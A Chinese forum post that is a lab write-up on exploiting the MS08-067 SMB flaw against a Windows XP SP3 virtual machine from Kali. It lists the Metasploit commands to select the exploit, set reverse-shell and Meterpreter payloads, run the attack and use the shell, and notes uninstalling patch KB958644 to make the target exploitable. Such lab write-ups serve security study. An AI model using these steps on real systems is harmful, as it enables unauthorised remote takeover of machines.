设为首页 收藏本站
查看: 1163|回复: 0

[经验分享] yaya5204

[复制链接]

尚未签到

发表于 2017-6-23 10:22:15 | 显示全部楼层 |阅读模式
MS08_067漏洞渗透攻击实践

实验前准备
  1、两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。
  2、在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,之后两台虚拟机就可以直接ping通。如下图:
DSC0000.png

  如果ping不通,一般是ip地址不在同一个网段上,需要重新设置xp的ip地址,打开:控制面板->网络连接->右击本地连接选择属性->选择internet协议(TCP/IP)->属性,就可以编辑ip地址了。例如:kali ip是192.168.241.131,xp ip设置为:192.168.241.130。前三位一样,最后一位随便设置。

MS08_067远程漏洞攻击实践:Shell
  1、在kali终端中开启msfconsole。
  2、输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:
DSC0001.png

  3、输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
  4、输入命令show payload会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。
DSC0002.png

  5、命令show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:
DSC0003.png

  6、使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
  7、输入命令show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。
DSC0004.png

  8、输入命令
  

set LHOST "kali Ip"  

  
set RHOST "Win xp Ip"
  

  

  并使用命令show options再次查看payload状态。
DSC0005.png

  9、输入命令exploit开始攻击,如下图所示是正常攻击成功结果。
DSC0006.png

  在kali上执行ipconfig/all得到如下图所示:
DSC0007.png

  在win xp上执行同样的命令,如下图所示:
DSC0008.png


MS08_067远程漏洞攻击实践:meterpreter
  1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。
  2、设置payload:set payload windows/meterpreter/reverse_tcp
  3、show options,查看需要设置的ip地址,如下图所示,是已经设置好的
DSC0009.png

  4、成功攻击结果:
DSC00010.png

  5、执行ifconfig,查看靶机地址:
DSC00011.png

  6、ps查看进程:
DSC00012.png

  7、meterpreter转shell:
DSC00013.png


实验中遇到的问题
  1、在做实验的时候用老师的xp系统作为靶机,但是在exploit的时候显示如下:no session was created。
DSC00014.png

  2、手动设置一个set session 1,结果还是不成功。
  3、在exploit前,使用check查看靶机状态,返回以下信息,表明目标主机是安全的,不能被攻击。
DSC00015.png

  4、网上查到可以卸载ms08_067的补丁,即卸载KB958644,文件路径:c:/windows找到KB958644(这是个隐藏文件),打开卸载exe程序,如下:
DSC00016.png

  5、重启后,还是不能成功,最后找了一个英文版的win xp sp 3 ,才成功完成。

运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-387205-1-1.html 上篇帖子: Ubuntu下Hyperledger Fabric v0.6安装部署 下篇帖子: 【血的教训】玩 Ubuntu 遇到的致命问题(进不了系统)及 解决方案
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表